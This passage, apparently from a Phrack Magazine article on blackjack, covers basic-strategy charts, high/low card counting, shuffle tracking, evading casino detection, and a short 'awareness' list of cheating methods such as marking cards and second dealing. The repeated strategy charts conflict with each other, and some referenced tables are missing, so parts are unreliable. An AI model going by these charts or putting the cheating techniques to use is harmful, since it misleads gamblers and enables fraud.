+-----+---+---+---+---+---+---+---+---+----+---+
| A,4 | H | H | D | D | D | H | H | H | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| A,5 | H | H | D | D | D | H | H | H | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| A,6 | D | D | D | D | D | H | H | H | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| A,7 | S | D | D | D | D | S | S | H | H | S |
+-----+---+---+---+---+---+---+---+---+----+---+
| A,8 | S | S | S | S | D | S | S | S | S | S |
+-----+---+---+---+---+---+---+---+---+----+---+
| A,9 | S | S | S | S | S | S | S | S | S | S |
+-----+---+---+---+---+---+---+---+---+----+---+
| A,A | P | P | P | P | P | P | P | P | P | P |
+-----+---+---+---+---+---+---+---+---+----+---+
| 2,2 | H | P | P | P | P | P | H | H | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| 3,3 | H | H | P | P | P | P | H | H | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| 4,4 | H | H | H | D | D | H | H | H | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| 6,6 | P | P | P | P | P | H | H | H | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| 7,7 | P | P | P | P | P | P | H | H | S | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| 8,8 | P | P | P | P | P | P | P | P | P | P |
+-----+---+---+---+---+---+---+---+---+----+---+
| 9,9 | P | P | P | P | P | S | P | P | S | S |
+-----+---+---+---+---+---+---+---+---+----+---+
|10,10| S | S | S | S | S | S | S | S | S | S |
+-----+---+---+---+---+---+---+---+---+----+---+
H = Hit S = Stand D = Double Down P = Split
Dealer's Up-Card
Your +---+---+---+---+---+---+---+---+----+---+
Hand | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | A |
+-----+---+---+---+---+---+---+---+---+----+---+
| 8 | H | H | H | H | H | H | H | H | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| 9 | H | D | D | D | D | H | H | H | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| 10 | D | D | D | D | D | D | D | D | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| 11 | D | D | D | D | D | D | D | D | D | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| 12 | H | H | S | S | S | H | H | H | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| 13 | S | S | S | S | S | H | H | H | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| 14 | S | S | S | S | S | H | H | H | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| 15 | S | S | S | S | S | H | H | H | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| 16 | S | S | S | S | S | H | H | H | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| 17 | S | S | S | S | S | S | S | S | S | S |
+-----+---+---+---+---+---+---+---+---+----+---+
| A,2 | H | H | H | D | D | H | H | H | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| A,3 | H | H | H | D | D | H | H | H | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| A,4 | H | H | D | D | D | H | H | H | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| A,5 | H | H | D | D | D | H | H | H | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| A,6 | H | D | D | D | D | H | H | H | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| A,7 | S | D | D | D | D | S | S | H | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| A,8 | S | S | S | S | S | S | S | S | S | S |
+-----+---+---+---+---+---+---+---+---+----+---+
| A,9 | S | S | S | S | S | S | S | S | S | S |
+-----+---+---+---+---+---+---+---+---+----+---+
| A,A | P | P | P | P | P | P | P | P | P | P |
+-----+---+---+---+---+---+---+---+---+----+---+
| 2,2 | H | H | P | P | P | P | H | H | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| 3,3 | H | H | P | P | P | P | H | H | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| 4,4 | H | H | H | H | H | H | H | H | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| 6,6 | H | P | P | P | P | H | H | H | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| 7,7 | P | P | P | P | P | P | H | H | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| 8,8 | P | P | P | P | P | P | P | P | P | P |
+-----+---+---+---+---+---+---+---+---+----+---+
| 9,9 | P | P | P | P | P | S | P | P | S | S |
+-----+---+---+---+---+---+---+---+---+----+---+
|10,10| S | S | S | S | S | S | S | S | S | S |
+-----+---+---+---+---+---+---+---+---+----+---+
H = Hit S = Stand D = Double Down P = Split
Dealer's Up-Card
Your +---+---+---+---+---+---+---+---+----+---+
Hand | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | A |
+-----+---+---+---+---+---+---+---+---+----+---+
| 8 | H | H | H | H | H | H | H | H | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| 9 | H | D | D | D | D | H | H | H | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| 10 | D | D | D | D | D | D | D | D | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| 11 | D | D | D | D | D | D | D | D | D | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| 12 | H | H | S | S | S | H | H | H | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| 13 | S | S | S | S | S | H | H | H | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| 14 | S | S | S | S | S | H | H | H | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| 15 | S | S | S | S | S | H | H | H | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| 16 | S | S | S | S | S | H | H | H | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| 17 | S | S | S | S | S | S | S | S | S | S |
+-----+---+---+---+---+---+---+---+---+----+---+
| A,2 | H | H | H | D | D | H | H | H | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| A,3 | H | H | H | D | D | H | H | H | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| A,4 | H | H | D | D | D | H | H | H | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| A,5 | H | H | D | D | D | H | H | H | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| A,6 | H | D | D | D | D | H | H | H | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| A,7 | S | D | D | D | D | S | S | H | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| A,8 | S | S | S | S | S | S | S | S | S | S |
+-----+---+---+---+---+---+---+---+---+----+---+
| A,9 | S | S | S | S | S | S | S | S | S | S |
+-----+---+---+---+---+---+---+---+---+----+---+
| A,A | P | P | P | P | P | P | P | P | P | P |
+-----+---+---+---+---+---+---+---+---+----+---+
| 2,2 | P | P | P | P | P | P | H | H | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| 3,3 | P | P | P | P | P | P | H | H | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| 4,4 | H | H | H | P | P | H | H | H | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| 6,6 | P | P | P | P | P | H | H | H | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| 7,7 | P | P | P | P | P | P | H | H | H | H |
+-----+---+---+---+---+---+---+---+---+----+---+
| 8,8 | P | P | P | P | P | P | P | P | P | P |
+-----+---+---+---+---+---+---+---+---+----+---+
| 9,9 | P | P | P | P | P | S | P | P | S | S |
+-----+---+---+---+---+---+---+---+---+----+---+
|10,10| S | S | S | S | S | S | S | S | S | S |
+-----+---+---+---+---+---+---+---+---+----+---+
H = Hit S = Stand D = Double Down P = Split
# ==Phrack Magazine==
Part 2 of 2 (50K)
Card Counting:
--------------
The first card counting systems were developed by our old friend Dr. Thorp.
He determined through mathematical computation that the card that has the most
influence on the deck being in a favorable condition (for the player) was the
five. When the deck is low in fives, the player has a higher advantage than if
it's sparse in any other card. Logic dictated that for a very simple card
counting strategy, simply keep track of the abundance (or lack thereof) of
fives. This is the basis of his "Five Count" system which was later improved
to include tens and renamed the "Ten Count" system.
Today, there are many different card counting systems. Typically, the more
complex a system is, the better your advantage should you master it. However,
the difference between card counting System X and System Y is usually so small
that ease of using the system becomes more important than gaining an
additional .15 % advantage or whatever it is. I am going to restrict the
discussion to a single card counting system: the high/low (also called the
plus/minus) point count. This strategy is very easy to master. Two other
methods that I recommend if you're serious are the Advanced Plus/Minus and the
"Hi-Opt I" systems. The former being similar to the high/low but assigns
fractional values to certain cards as opposed to integer values which are
easier to add in your head. The latter method is considered one of the most
powerful yet reasonable (with respect to complexity) counting systems of all
time and is detailed extensively on pages 213 to 277 of [7].
The quick and dirty reason why card counting works is this: The player
gains an advantage when a deck has a SHORTAGE of cards valued 2, 3, 4, 5, 6,
7, 8. When a deck has a SHORTAGE of cards valued 9, 10, Ace; the player has a
DISadvantage. If you can tell when the deck is rich in 9's, 10's, and Aces
(ie, when you hold the advantage) you can do one of the following things:
Now lets discuss the +/- Point Count. As you can see from the small chart
below, a plus value is given to low cards, and a minus value is given to high
cards. Notice that 7, 8, and 9 have a value of zero. This is because their
overall effect is negligible as compared to the others. Some systems use a
value of -2 for the Ace instead of -1 and give a value of +1 to the seven
instead of zero. If you are using a BlackJack computer game for practice,
check to see what card counting system(s) it uses. They should offer one of
the above two variations. Learn that one, since it will allow you to prepare
well for actual casino play. See the "Some Comments Regarding Computer
BlackJack Programs for the PC" section for more on this. Now the chart:
+-----------------------------------------+
| PLUS (+1) || MINUS (-1) |
+-----------------------------------------+
| 2 | 3 | 4 | 5 | 6 || 7 | 8 | 9 | 10 | A |
+-----------------------------------------+
| 1 | 1 | 1 | 1 | 1 || 0 | 0 | 0 | 1 | 1 |
+-----------------------------------------+
As you may notice, this is a balanced system. There are 20 cards in a deck
that are valued +1: two through six. There are 16 ten value cards and 4 Aces
in a deck (20 total) that are valued -1. The remaining 12 cards (7, 8, 9) have
a value of zero. At the end of a deck the count should be zero. A good drill
to practice is to get a deck of cards, turn them over one by one, and keep
track of the count. If you enter a game mid-way between the deck or shoe, flat
bet until the cards are shuffled. Once the cards are shuffled commence
counting from zero.
Lets do a quick example using ten cards. The following ten cards are shown
in the course of a hand: A, 4, 7, 10, 10, 9, 10, 2, 10, 5. Just so no one gets
lost, we will do one card at a time and then keep the running total: the first
value is -1 (the Ace) & the second is +1 (the 4) = 0 (the current total hand
count). The next card is the 7 which is zero so disregard it. The next card is
a ten so the total count is now -1. The next card is another ten, giving a
total count of -2. The next card is a nine which has a value of zero so ignore
it, total count is still at -2. Next is a ten, total count is at -3. Next is
a two which adds +1 to the minus three yielding a total of -2. A quick look at
the next two cards shows that the two will cancel each other out (-1+1=0). So
at the end of a hand of ten cards dealt to 2 players and the dealer, the point
count is minus two. This provides you with the knowledge that your are at a
slight disadvantage. Your next bet should either be the same or a unit or two
lower.
From this example you see that it would be easier to count cards if you
play in a "cards-up" game. That way you can see all the cards as they are
dealt and count them as they go by. When the dealer deals fast, just count
every two cards. You still count each card but you only add to your total
count after every two cards since many times the two values will cancel each
other out to give a net value of zero, which doesn't need to be added to your
total. If you play in a cards-down game, you may want to consider playing at
third base. The reason being is that in a cards-down game you only see the
other players' cards:
a) if you peek at their hand (not polite but it's not cheating like in poker)
b) if a player busts
c) when the dealer settles each players' hand.
When there are other people at a table, all this happens rather quickly and
you may miss a few cards here and there which essentially invalidates your
count. You can't control how fast the dealer deals, but you can slow things
down when the dealer prompts you for a play decision.
I am not going to discuss changing basic strategy here. The chart you
memorize in Basic Strategy section of this file will be fine for now. If you
are already adept at the plus/minus count then find a book that has a complete
system including the appropriate changes to Basic Strategy that reflect the
current running and/or true count.
For one deck, alter your wager according to the following table:
Example: After the first hand of a one deck game, the point count is plus
four and you just bet a $5.00 chip. Before the next hand is dealt, wager
$15.00 (three units of $5.00) as the above table mandates.
What if there are four, six, or more decks instead of just one? I recommend
that you perform a "true-count" rather than trying to remember different
betting strategies for different number of deck games. By doing a true count,
the above table can still be used.
The True Count is found by the ensuing equation. I provide an example along
with it for the case of having a running count of +9 with one and a half decks
left unplayed. It doesn't matter how many decks are used, you just have to have
a good eye at guesstimating the number of decks that are left in the shoe. I
just measured the thickness of a deck of cards to be 5/8 (10/16) of an inch.
Hence the thickness of a half deck is 5/16 of an inch. One and a half decks
would be 10/16 + 10/16 + 5/16 = 25/16 or a little over an inch and a half. You
probably see a relationship here. The number of decks is approximately equal
to the height of the cards in inches. Easy.
Running Count +9
True Count = ---------------------- = ----- = +6
# of Decks Remaining 1.5
Looking at the table of betting units above, the proper wager would be four
units.
If you have trouble keeping the count straight in your head, you can use
your chips as a memory storage device. After every hand tally up the net count
and update the running or true count by rearranging your chips. This is
somewhat conspicuous however, and if done blatantly, may get you labeled a
counter.
If for some reason you despise the notion of counting cards, you may want
to pick up Reference [11], "Winning Without Counting". The author writes about
using kinesics (body language) to help determine what the dealers' hole card
is after checking for a Natural. He claims that certain dealers have certain
habits as far as body language is concerned, especially when they check to see
if they have a BlackJack. The dealer will check the hole card if he/she has a
ten value card or an Ace as the up-card. When the hand is over you will see
what the hole card really was. You may be able to discern a certain
characteristic about the dealer, such as a raising of the eyebrows whenever
the hole card is a 2-9 or perhaps a slight frown, etc. There is some
usefulness to this method but I wouldn't rely on it very much at all. I have
only used it for one particular situation. That being when the dealer has a
ten up card and checks to see if the hole card is an Ace. Note that many
dealers check the hole card very quickly and turn up just the corner of the
card so as to prevent any of the players from seeing the card. If the hole
card is an Ace, the dealer will turn over the card and declare a BlackJack.
However, if the hole card is a 4, many times the dealer will double check it.
The reason for this double take is simply that a 4 looks like an Ace from the
corner, get a deck of cards and see for yourself. A 4 really looks like an Ace
and vice-versa when the corner is checked in a QUICK motion. So, if you see
the dealer double check the hole card and NOT declare a BlackJack, you can be
fairly sure the hold card is a four, giving the dealer a total of 14. You can
now adjust your basic strategy play accordingly. This situation has only come
up a few times in my case, but once was when I had a $50.00 bet riding on the
hand and I won the hand by using that additional information. Dr. Julian Braun
has previously calculated that the player has about a 10% advantage over the
house should he/she know what the dealer's hole card is. This is quite
substantial. Of course you have to memorize a specific Basic Strategy chart
for the case of knowing what the dealers' total is in order to obtain the
maximum benefit. I haven't bothered memorizing this chart simply because it is
a rare occurrence to know what the dealers' hole card is. If you sit down at a
table with an inexperienced dealer, you might catch a couple more than usual,
but I don't think it is enough to warrant the extra work unless you want to
turn pro.
One last thing. There is no law or rule that says a dealer cannot count
cards. A dealer may count cards because he or she is bored but more likely is
that the casino may encourage counting. The reason being that if the deck is
favorable to the player, the house can know this and "shuffle up". This is
also called preferential shuffling (a game control measure) and it vaporizes
your advantage.
Shuffle Tracking:
-----------------
Shuffle What? Shuffle Tracking. This is a fairly new (15 years +/-)
technique that has not been publicized very much. One problem with many of the
BlackJack books out there is that they are not hip to the current game. The
obvious reason for this is that many are old or simply re-formulate strategies
that were invented decades ago. It's just like reading "How to Hack the Primos
Version 18 Operating System" today. The file may be interesting, many of the
commands may be the same, but it doesn't detail how to take advantage of, and
subvert the CURRENT version of the OS.
The best definition I have seen is this one quoted from Reference [5]:
"'Shuffle-tracking' is the science of following specific cards through the
shuffling process for the purpose of either keeping them in play or cutting
them out of play." The concept of Shuffle tracking appears to have resulted
from bored mathematician's research and computer simulation of shuffling
cards, a familiar theme to BlackJack you say. The main thing that I hope every
reader gets from this section is that just because someone shuffles a deck (or
decks) of cards does not in any way mean that the cards are "randomized". The
methods mentioned in the two previous sections (Basic Strategy and Card
Counting) ASSUME A RANDOM DISTRIBUTION OF CARDS! That is an important point.
According to some authors, a single deck of cards must be shuffled twenty to
thirty times to ensure a truly random dispersion. If a Casino is using a 6
deck shoe, that's 120 to 180 shuffles! Obviously they aren't going to shuffle
anywhere near that many times. But don't despair, there are some types of
shuffles which are good, and some that are bad. In fact, if the cards were
always randomly disbursed, then you would not be reading this section due to
it's lack of relevance. As in the Card Counting section, I am going to
restrict the discussion to the basics of shuffle tracking as the combination
of references listed at the end of this section provide a complete discourse of
the topic.
A beneficial (to the player) shuffle for a one deck game is executed by
dividing the deck equally into 26 cards and shuffling them together a minimum
of three times. This allows the cards to be sufficiently intermixed to yield a
fairly random distribution. An adverse shuffle prevents the cards from mixing
completely.
The simplest example is the Unbalanced Shuffle. As its name implies, the
dealer breaks the deck into two unequal stacks. As an example, lets say you
are playing two hands head on with the dealer and the last 10 cards in the
deck are dealt. The result of the hand was that both your hands lost to the
dealer primarily due to the high percentage of low value cards in the clump.
Note that if you were counting, you would have bet a single unit since the
deck was unfavorable. The dealer is now ready to shuffle the deck, and
separates the deck into 31 cards in one stack and 21 in the other stack. The
dealer shuffles the two stacks. If the shuffle is done from the bottom of each
stack on up, the top ten cards of the larger stack will remain intact without
mixing with any of the other cards. Those ten cards can remain in the order
they were just dealt throughout the shuffle if the process of bottom to top
shuffling is not altered. You are now asked to cut the deck. If you don't cut
the deck, the 10 cards that were dealt last hand will be dealt as your first
two hands. The result will be the same as your last and you will lose the two
hands. However, if you cut the deck exactly at the end of those ten cards, you
have just altered the future to your benefit. Those cards will now be placed at
the bottom of the deck. Should the dealer shuffle up early, you will avoid them
altogether. In addition, if you were keeping count, you would know that the
deck was favorable during the first 3-4 hands since there would be an abundance
of tens in the portion of the deck that will be played. You would accordingly
increase you bet size to maximize your winnings.
Some dealers will unknowingly split the deck into unequal stacks. However,
more often than not, they are REQUIRED to split the deck into unequal stacks.
If they are required to do this, they are performing the House Shuffle. The
casino has trained the dealer to shuffle a particular way...on purpose! Why?
Because in the long run, the house will benefit from this because most players
will not cut any bad clumps out of play. If you have played BlackJack in a
casino, how much did you pay attention to the way they shuffled? Like most
people you were probably oblivious to it, perhaps you figured that during the
shuffle would be a good time to ask that hot waitress for another drink.
Regardless, you now see that it may be a good idea to pay attention during the
shuffle instead of that set of "big breastseses" as David Allen Grier says on
the "In Living Color" TV show ;)-8-<
There are a number of shuffle methods, some of which have been labeled as:
the "Zone Shuffle", the "Strip Shuffle", and the "Stutter Shuffle". The Zone
Shuffle is particular to shoe games (multiple deck games) and is probably one
of the most common shuffle methods which is why I mention it here. It is
accomplished by splitting the shoe into 4 to 8 piles depending on the number
of decks in the shoe. Prescribed picks from each pile are made in a very exact
way with intermittent shuffles of each pair of half deck sized stacks. The net
effect is a simple regrouping of the cards pretty much in the same region of
the shoe as they were before, thereby preventing clumps of cards from being
randomly mixed. If the dealer won 40 hands and you won 20, this trend is
likely to continue until you are broke or until the unfavorable bias is
removed through many shuffles.
What if the players are winning the 40 hands and the dealer only 20? If the
dealer has been mentally keeping track of how many hands each side has won in
the shoe, the dealer will probably do one of two things. One is to keep the
shuffle the same, but 'strip' the deck. When a dealer strips a deck, he/she
strips off one card at a time from the shoe letting them fall on top of one
another onto the table. This action causes the order of the cards to be
reversed. The main consequence is to dissipate any clumping advantages (a bunch
of tens in a clump) that the players may have. The second thing the dealer may
do is simply change the way they shuffle to help randomize the cards.
I personally believe that casinos use certain shuffles on purpose for the
sole reason that they gain some sort of advantage. A BlackJack dealer friend
of mine disputes the whole theory of card clumping and shuffle tracking
though. The mathematics and simulation prove the non-random nature of certain
shuffles under controlled conditions. Perhaps in an actual casino environment
the effect isn't as high. Regardless, next time you are playing in a casino
and its time to shuffle a shoe, ask the dealer to CHANGE they WAY he/she
shuffles. The answer will nearly always be NO. Try to appeal to the pit boss
and he/she will probably mumble something about casino policy. Why are they
afraid to change the shuffle?
Relevant Reading: [4], [5] Chapters 5 and 6 pages 71 to 98, [14] pages 463
to 466, and [15] which is very detailed and accessible via Internet FTP.
EYE IN THE SKY: A two way mirror in the ceiling of the casino. It's not hard
to spot in older casinos as it usually is very long. Before 1973 or so,
employees traversed catwalks in the ceiling and it was easy for dealers and
players to hear when they were being watched. Sometimes dust from the ceiling
would settle down onto a table when someone was above it. Newer casinos use
those big dark plexiglass bubbles with video camera's which should be watched
constantly. These cameras have awesome Z00M capabilities and according to
Reference [9], the cameras can read the word "liberty" on a penny placed on a
BlackJack table. I am sure the resolution is better than that for the latest
equipment. The video images are also taped for use as evidence should anything
that is suspect be detected. Just like computer security audit logs, if no one
pays attention to them, they don't do much good. If you want a job monitoring
gamblers and casino employees, you need to train for about 500 hours (about
twenty 40 hour weeks) to learn all the tricks people try to pull on you.
Pretty intensive program wouldn't you say?
CASINO EMPLOYEES: Then there are the casino employees. The dealers watch the
players, the floor men watch the dealers and the players, the pitbosses watch
the dealers, the floormen, and the players, etc. There may be plain clothes
detectives roaming about. In a casino, everyone is suspect.
BLACK BOOK: A company that you will see mentioned in a lot of casino books is
Griffin Investigations. They periodically update a book that casino's
subscribe to that have pictures and related info on barred card counters and
known casino cheats.....I suppose the "black book" as it is called, is
analogous to the "Bell security hit-lists", that had (have?) files on known
phreaks and hackers.
References [3], [7], and [8] have many stories regarding playing in
casinos, getting barred, and various exploits. I am not going to repeat any of
them here. In each of those books, the authors talk about their first
experiences getting barred. In each case they were fairly bewildered as to why
they were kicked out, at least until some casino employee or owner told them
things like "you're just too good" and the ever diplomatic: "we know your
kind, get the hell out!".
As you probably have gathered thus far, card counters are as undesirable in
a casino as a phone phreak is in a central office. There are a number of
behavioral characteristics which have been attributed to the 'typical' card
counter. Probably the most obvious act of a counter is a large increase in bet
size. If you recall in the Card Counting section, when the deck is favorable,
you bet more. When the deck is unfavorable, you bet less. Dr. Thorp's original
system required a variation in bet size from one to ten units. When the deck
is favorable the system may dictate that you go from a ten dollar bet to a
hundred dollar bet. Kind of gets the attention of the dealer and the pit boss.
However, this type of wild wagering is typical of big money hunch bettors.
Hunch betters will just plop down a bunch of chips at random due to 'hunches'.
Therefore, a large increase in bet size won't necessarily cause you to be
pegged as a counter.
Intense concentration, never taking your eyes off the cards, lack of
emotion...ie, playing like a computer, is pretty much a give away that you are
counting. Other things such as 'acting suspicious', meticulously stacking your
chips, betting in discernable patterns, and a devout abstention from alcohol
may also attract unwanted attention.
Another criteria used for spotting counters is if there are two or more
people playing in concert with one another. Ken Uston is famous for his
BlackJack teams. They have literally won millions of dollars collectively.
When the "Team-LOD" gets together to play, we have to pretend we don't know
each other so as not to attract undue attention ;-)
What I mean by Social Engineering the casino is to list ways that trick the
casino into thinking you are just a dumb tourist who is throwing money away.
Look around, smile, act unconcerned about your bet, don't be afraid to talk to
the dealer, floorperson, or pit boss. Don't play 8 hours straight. Perhaps
order a drink. Things of this nature will help deflect suspicion.
I only recall attracting attention once. The casino wasn't very busy, there
were 3 people at the table including myself. I only had about an hour to play
so I bet aggressively. I started with $5 and $10 but made some $50.00 bets
whenever I got a feeling that I was going to win the next hand (quite the
scientific strategy I know). A woman next to me who seemed to be a fairly
seasoned player made a comment that I was a little too aggressive. The pit boss
hovered about the table. My hour was nearly up, I bet $10.00 for the dealer and
$50.00 for myself. I lost the hand leaving me only $100.00 ahead, and left. The
only thing I could think of besides the betting spread which really wasn't a
big deal was that the casino was FREEZING inside. I was shivering like hell,
it probably looked like I was shaking out of fear of being spotted as a
counter or worse...a cheater.
Tipping the dealer may not necessarily get the casino off your back but
certainly doesn't hurt. When you toke the dealer, place the chip in the corner
of your betting box a few inches from your bet. You may want to say "we are in
this one together" or some such to make sure they are aware of the tip. This
approach is better than just giving them the chip because their 'fate' is tied
in with yours. If your hand wins, 99 out of 100 times they will take the tip
and the tip's winnings off the table.
The 1 out of 100 that the dealer let the tip+win ride happened to me over
and over again for the better part of a day. It was a week before I had to go
back to college and I was broke, with no money to pay the deposits for rent
and utilities. Basically, if I didn't come up with some money in 7 days, I was
not going back to school. This was 4 years ago BTW. I took out $150 on my
credit card (stupid but hey, I was desperate) and started playing and winning
immediately. I pressed my bets time and time again and in an hour or two had
$500 in front of me (+$350). I started losing a bit so I took a break for a
short while. I went back to a different table with a different dealer. As soon
as I sat down I started winning. I started to tip red chips ($5.00) for the
dealer. The first couple of times he took the $10.00 right away. I kept
winning steadily and continued to toke him. Then he started to let the $10.00
ride! I was amazed because I had never seen that before. That is when I knew I
was HOT. If the dealer is betting on you to win, that says something. When I
stopped playing I cashed in eight black chips. I left with eight one hundred
dollar bills, a net profit of $650.00, just enough to cover everything. Whew!
I probably tipped close to $100.00 that day, and the dealer must have made
double to triple that due to him betting with me. There were a number of times
when the pit boss wasn't close that the dealer would IGNORE my hit or stand
signal. The first time he did this I repeated myself and he did what I asked
but gave me a 'look'. Needless to say, I lost the hand. After that, if he
'thought' I said stand, I didn't argue. This occurred when he had a ten as the
up-card so he knew his total from peeking at the hole card. I am not sure if
this is considered cheating because I did not ask him to do this, nor did we
conspire. It just happened a few times, usually when I had $25-$50 bets on the
line which is when I made sure to throw in a red chip for him.
Cheating by the house is rare in the major casinos ie, those located in
Nevada and Atlantic City. The Nevada Gaming Commission may revoke a casino's
gambling license if a casino is caught cheating players. Granted, there may be
a few employees (dealers, boxmen, whomever) that may cheat players, but it is
extremely doubtful any casino in Nevada or Atlantic City does so on a
casino-wide scale. You definitely should be wary of any casino that is not
regulated such as those found on many cruise ships. Because a casino does not
have to answer to any regulatory agency does not mean it is cheating players.
The fact is that casino's make plenty of money legitimately with the built-in
house advantages and don't really need to cheat players to survive. I provide
some cheating methods here merely to make you aware of the scams. These
techniques are still carried out in crooked underground casinos and private
games.
The single deck hand-held BlackJack game is quite a bit more susceptible to
cheating by both the dealer and the player than games dealt from a shoe. The
preferred method of dealer cheating is called the "second deal". As you may
infer, this technique requires the card mechanic to pretend to deal the top
card but instead deals the card that is immediately under the top card.
Imagine if you could draw a low card when you need a low card, and a high card
when you need a high card. You could win large sums of money in a very short
period. Well, a dealer who has the ability to execute the demanding sleight of
hand movements for second dealing can drain even the best BlackJack player's
bankroll in short order.
If someone is going to deal seconds, they must know what the second card is
if he or she is to benefit. One way to determine the second card is by
peeking. A mechanic will distract you by pointing or gesticulating with the
hand that is holding the deck. "Look! There's Gail Thackeray!". While you are
busy looking, the dealer is covertly peeking at the second card. A more risky
method is pegging. A device called a pegger is used to put small indentations
in the cards that the dealer can feel. Pegging all the ten value cards has
obvious benefits.
Another method is the "high-low pickup". I like this one because it's easy
for a novice to do especially in a place where there are a lot of distractions
for the players. After every hand, the dealer picks up the cards in a high-low
alternating order. The mechanic then proceeds with the "false shuffle" in
which the deck is thought to have been shuffled but in reality the cards
remain in the same order as before the shuffle. As you well know by now, a
high-low-high-low arrangement of the cards would be death to the BlackJack
player. Get dealt a ten and then a 5, you have to hit, so get another ten.
Busted. Since the dealer doesn't lose until he/she busts, all the players who
bust before lose. Bottom dealing and switching hole cards are other techniques
that may be used to cheat players.
For shoe games, there is a device called a "holdout shoe" that essentially
second deals for the dealer. Discreet mirrors and prisms may be contained in
the holdout shoe which only allow the dealer to see what card is next.
Shorting a regular shoe of ten cards will obviously have a detrimental effect
on the BlackJack player.
Player cheating isn't recommended. However, I'll quickly list some of the
methods for awareness purposes. The old stand-by of going up to a table,
grabbing some chips, and running like hell is still done but certainly lacks
originality. Marking cards while you play is another popular method. "The
Daub" technique is done by clandestinely applying a substance that leaves an
almost invisible smudge on the card. High value cards like tens are usually
the targets. One scam mentioned in one of the references was the use of a
special paint that was only visible to specially made contact lenses. The
"hold out" method requires the palming of a card and substituting a better
one. This is usually done when there is big money bet on the hand. One of the
risks to these methods is when the deck is changed since the pit boss always
scrutinizes the decks after they are taken out of play.
Other methods entail playing two hands and switching cards from one hand to
the other, counterfeiting cards and/or casino chips, adding chips after a
winning hand (I have seen this done twice, couldn't believe my eyes but
certainly wasn't going to RAT the thieves out). Some dealers may be careless
when looking at their hole card for a BlackJack. A person behind the dealer on
the other side of the pit may be able to discern the card. The value is then
signalled to a player at the table. Astute pit bosses may notice someone who
is not playing that scratches their head too much though. Wireless signalling
devices have been used for various purposes but some casinos have new
electronic detection systems that monitor certain frequencies for activity.
Some features that I liked about this scaled down version of their
BlackJack program were the TUTOR, which advises you on whether to hit, stand,
take insurance (no way), etc. as per Basic Strategy. The Tutor for the
abridged version does NOT take into consideration the card count when making
recommendations though. If you are counting the cards, the program keeps count
also, so if you lose count you can check it by pressing a function key. The
STATS option is neat since it keeps track of things such as how many hands
were dealt, how many you won/lost, etc. and can be printed out so you can
track your progress. The program allows you to save your current session in
case you get the urge to dial up the Internet to check your email, something
that should be done every hour on the hour....
One thing I did not like about the program was that it allowed you to bet
over your bankroll. I accidentally pushed [F2] (standardized at $500.00 a
bet instead of [F1] (standardized at $5.00 a bet) ---- a slight difference in
wager I'd say. Having only $272.00 in my bankroll didn't stop the program from
executing the command and in my opinion it should have prevented the overdraft.
The first time I played Dr. Thorp's Mini BlackJack, it took me about 95
hands to double my money. I started with $200.00, bet from $5.00 to $25.00,
never dropped below $180.00 which surprised me, and received 3 BlackJacks. I
won 63 hands, and lost 32. I played head on against the dealer, although the
program allows for up to 6 players. I consider that lucky since I had my fair
share of going broke in later sessions.
My advice when using a BlackJack computer program is: do not start with a
bizzillion dollars or anything like that. Start with the amount that you truly
plan to use when you sit down at an actual table. If you play in a crowded
casino, all the low minimum bet tables (ie: $1.00 to $5.00) will most likely be
filled to capacity and only $10.00 or $15.00 tables will have openings. Keep
this in mind because when you make bets with the computer program, you should
wager no less than whatever the minimum will be at the table you sit down at.
If your bankroll is only $200.00 playing at anything more than a $5.00 minimum
table is pushing it.
A few people suggested I briefly mention some of the other casino games so
I added this section. I don't go into much detail at all as this file is too
unwieldy already. Besides, if you want to know more, I am sure you'll pick up
the appropriate reference. Hundreds of books have been published on gambling
and they are available by contacting [2]. My aim here was to mention details
that most people may not be aware of.
BACCARAT: This is the game you see in movies a lot. See [12]'s FAQ for a good
explanation of this game.
CRAPS: Craps is probably the most complicated casino game as far as the
different ways to bet things are concerned but its really not that hard to
learn. I just want to throw one table at you adapted from Reference [13]. The
